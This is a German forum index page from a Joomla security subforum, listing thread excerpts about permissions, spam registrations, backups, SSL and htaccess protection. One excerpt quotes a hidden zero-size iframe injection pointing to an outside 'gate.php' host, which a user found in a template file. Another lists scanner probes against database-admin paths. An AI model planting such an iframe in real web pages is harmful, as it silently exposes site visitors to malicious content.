Hinweise und Diskussionen rund um die Sicherheit von Joomla 2.5 / J1.7 und deren Erweiterungen
Moin Moin ! Um ein bißchen Ordnung in den Wust der ganzen Threads zu schaffen, bitten wir die Threadersteller nach Lösung Eures Problems die Threads umzubenennen. Dafür geht Ihr (die Ersteller des Threads!) folgendermaßen vor: 1. Ihr geht auf die erste Seite des Threads 2. Ihr klickt auf...
Hallo zusammen, weiß wer wie man sich über die Datenbank für einen bestimmten Benutzer "Skriptbenutzer" die Rechte auf einen Beitrag wiederholen kann. Ich kann den Beitrag zwar als "Super" löschen oder über die DB einfach raushauen, würde aber gerne nur Benutzer "Skriptbenutzer" die Rechte auf...
Guten Mittag, Fall 1: Hatte (vorher) immer einen sogenannten Administrator-Verzeichnisschutz + einen Statistik Verzeichnisschutz. Diesen kann ich direkt im Kundencenter des Hosters mit 2 Klicks sozusagen 'erledigen' und klappte immer. Siehe dazu bitte die Bilder. - Wenn ich die Site...
Hallo Ich nutze das normale Captcha von Joomla 1.7 und auch von Kunena Nun registrieren sich bei mir dauernd Bots und spammen dann das Forum voll Entweder über Gastpost über Kunena Captcha oder über vollständige Registrierung in Joomla Wie kann ich das verhindern bzw. sicherer machen?
Hallo Habe gerade meine Seiten erfoglreich auf Joomla 2.5 umgestellt! Heute morgen habe ich dann festgestellt, dass auf der Startseite oben links eine seltsame Zahlenkombination, 1329164638, angezeigt wird. Nun stellt sich mir die Frage ob meine Seite (zum aller ersten mal seit Jahren, gehackt...
Hallo, normalerweise sicher ich manuell, aber ich komme nicht an die Sicherung der Datenbank meiner Freundin, weshalb ich nun akeeba nutzen wollte. Zuvor habe ich akeeba zur Sicherung für die Serverinstallation und akeeba Wizard für die Wiederherstellung auf der lokalen Installation meiner...
Guten Morgen, ich wollte ein Backup für mein Jommla 2.5.1-System über phpMyAdmin erstellen und hab dort meine Datenbank exportiert und auf meinen Rechner gespeichert. Jetzt wollte ich fragen, ob das reicht und ich, falls mal was passieren sollte und ich meine Homepage neu auflegen müsste, ich...
Hallo! Ich habe eine relativ neue Site (www.***.at) mit Joomla 1.7.3 und eine von meinem Vorgänger übernommene Site (www.****.at - wird gerade neu gemacht, alte Version ist nur noch einige Tage online) mit Joomla 1.0.12 bei emerion online. Nun ist ca. zu Weihnachten bei der 1.7.3 Website das...
Hallo, ich denke ich stelle mich da jetzt einfach zu blöd an. ich habe folgendes auf einer kleinen Seite von mir vor. Gäste sehen kaum was Registrierte sehen allgemeine Beiträge aber nix internes Freunde sehen alles das von Registrierte aber keine sensiblen Beiträge Familie sehen alles das...
Hallo, ich bin von joomla 1.5 auf 2.5 umgestiegen... und hab jetzt ein Problem mit den E-Mail-Adressen... diese sollten nicht direkt eingeblendet werden... zumindest nicht so das Spam-Roboter ein leichtes Spiel haben und da automatisch drauf senden können z.b. testuser@meinhaus.abc...
Hallo LEute Ich Depp habe aus versehen das Adminkonto gelöscht. Als ich mich wieder als Super User einloggen wollte, ging es nicht. Wie gesagt, Adminkonto gelöscht. Wie und wo kann ich im PHP Admin wieder ein Adminkonto erstellen? In der Configuration.php steht noch der Benutzername und das...
Hallo, finde unter Umleitungen plötzlich einen Haufen verschiedener Zugriffe auf diverse Kombinationen von http://xxx.net/dbadmin/index.php http://xxx.net/myadmin/index.php http://xxx.net/mysql-admin/index.php http://xxx.net/mysql/index.php
Hallo zusammen, ich habe da ein Problem, ich versuche seit 2 Tage eine Verschachtelung von Benutzern anzulegen. Leider geht es nicht oder ich verstehe es einfach nicht. Ich benutze Joomla 1.7.3 Ich habe folgendes vor: Eigentlich geht es um Benutzerrechte in einem Kalender aber die Rechte...
Schönen guten Abend, ich habe da ein kleines Problem und zwar... hat eine Freundin eine Seite für Katzenfreunde eröffnet existiert seit gut n halbes jahr und jetzt haben wir festgestellt, dass wenn man sein Passwort vergessen hat nur eine Fehlermeldung kommt, kann da wer helfen einen Tipp geben....
Hallo Allerseits! Ich bin gerade dabei die Joomla Seiten meiner Kunden sicherheitstechnisch etwas zu optimieren und habe mich zu diesem Zweck durch einige Foren, Bücher und Artikel gewälzt, aber leider zu dem folgenden Fall keine richtige Erklärung gefunden: Jeder Hacker, der Joomla kennt...
Hallo Zusammen, ich bin Hobbyfotograf und möchte meinen "Modellen" den Download ihrer Bilder ermöglichen. Ich möchte über Joomla das so regeln das jeder nur auf seinen Ordner zugreifen kann sprich: Modell A -> Ordner A Modell B -> Ordner B usw.
Habe erst vor kurzem eine Webseite mit J1.7.3 in Betrieb genommen. Im Frontend gibt es das Login-Modul und im Backend ist eingestellt, dass neue Benutzer nur den Status öffentlich bekommen die Aktivierung durch den Admin erfolgt. Das klappte bisher prima. Bei neuen Mitgliedern bekommt der...
Hallo Forum, Ich habe eine bestimmte Benutzergruppe mit dazugehöriger gleichnamiger Zugriffsebene, die direkt der Benutzergruppe "Öffentlich" unterstellt ist. Diese EINE Benutzergruppe namens "A" wird nach Login im Frontend zu einer bestimmten Seite weitergeleitet ("Redirect on Login...
Hallo Leute, bin gerade dabei eine Homepage für unseren Verein zu erstellen und habe mich nun um ein passendes Webhosting umgeschaut. Ich habe im Internet viele sehr günstige Angebote gefunden. Eine sehr teures sticht dabei heraus und zwar wird hier zusätzlich zum Webhosting ein Joomla -...
Hallo, ich habe die 2.5 auf englisch installiert und jetzt auch die deutschen und französischen language packs nachinstalliert. Im control panel sehe ich nun auch die 3 Sprachen und habe als default die deutsche gewählt. Frontend - OK. Wenn ich jetzt aber bei den Kategorien oder Beiträgen die...
... wie schon bei den anderen ... ? aber die Lösungen, die ich bisher gefunden habe haben nicht geholfen. ... Bei bekanntem Passwort und bisher genutztem Super Benutzer Joomla2.5, lokal mit xampp. Kann mich noch ins Frontend einloggen --> Passwort korrekt Habe schon einen neuen User übers...
Hallo zusammen, in den faq nichts gefunden, die sufu brachte auch nichts Erhellendes. Möchte den Zugang zum Backend mit https ermöglichen. (1) was muss ich in Joomla einstellen? (2) was muss ich Serverseitig einrichten?
Hallo zusammen, das administrator Verzeichnis wollte ich zusätzlich mit .htaccess schützen. Unter: http://www.joomla-security.de/adminbereich/htaccess-schutz.html http://www.joomla-security.de/dateien-verzeichnisse/htaccess-einstellungen.html werden noch weitere Verzeichnisse aufgeführt. ...
Hallo, ich habe bei meiner produktiven Seite unter J1.5 als Spam-Schutz die Komponente "security images" genutzt. Läuft die eigentlich auch unter J1.7??? Jedenfalls suche ich eine gute Variante um Spam-Registrierungen was entgegensetzen zu können. Danke
Guten Morgen, habe unseren Server heute Morgen mit einem Zertifikat gesichert und den Backend bereich auf SSL umgestellt. Nun würde ich gerne, das wenn man im Frontend auf anmelden klickt, der rest dann auch über eine gesicherte Verbindung läuft. Aber nur solange ich im Frontend angemeldet bin....
Hallo Forum, ein Kunde besitzt nur einen Webspace, wo er keinen Zugriff auf höhere Verzeichnisse hat. Er hat selbst nur Zugang zu Verzeichnissen, die im htdocs liegen bzw. also im Web erreichbar sind. Ich bin eigentlich nur ein C++ Programmierer, aber Folgendes sollte ja kein Problem...
Hab seit langem schon fake anmeldungen laufen, hatte aber Registrierung für alle offen ohne aktivierungslink gemacht gehabt. Seit heute habe ich Registrieung mit aktivierungslink aktiviert. Muss ich irgendwelche sicherheitsbedenken haben ? Meine Seite läuft auf joomla 1.5 ein upgrade auf 1.7...
Hallo ich habe auf einer meiner Testseiten in der Index.php vom Template fogenden Code gefunden.... <!--qpi--><iframe src=http://unclesammm.com/gate.php?f=971101 frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=0 height=0 border=0></iframe><!--/qpi--> was hat das zu bedeuten...
Hallöle Forumsgemeinde, ich habe folgendes Problem: Bei einer Website soll die Suchfunktion so geregelt werden, dass Besucher im öffentlichen Bereich nur Ergebnisse aus öffentlichen Beiträgen angezeigt bekommen. Desweiteren sollen angemeldete Nutzer aber den internen bereich voll...
Hiho, ich Trottel habe den Super Moderator aus der Zugriffsebene entfernt und nun kann ich mich zwar ins Backend einloggen, aber sehe kein Menu etc. mehr. Wie kann ich das (ohne Wiederherstellung eines Backups) wieder korrigieren? D.h. wie und wo kann ich z.B. in phpMyadmin wieder den...
Nur Themen anzeigen, die im ausgewählten Zeitraum erstellt wurden.
Geben Sie an, wonach die Themenliste sortiert sein soll.
Reihenfolge
Hinweis: Wenn nach dem Datum sortiert wird, werden bei 'absteigender Reihenfolge' die neuesten Elemente zuerst angezeigt.
Foren-Regeln
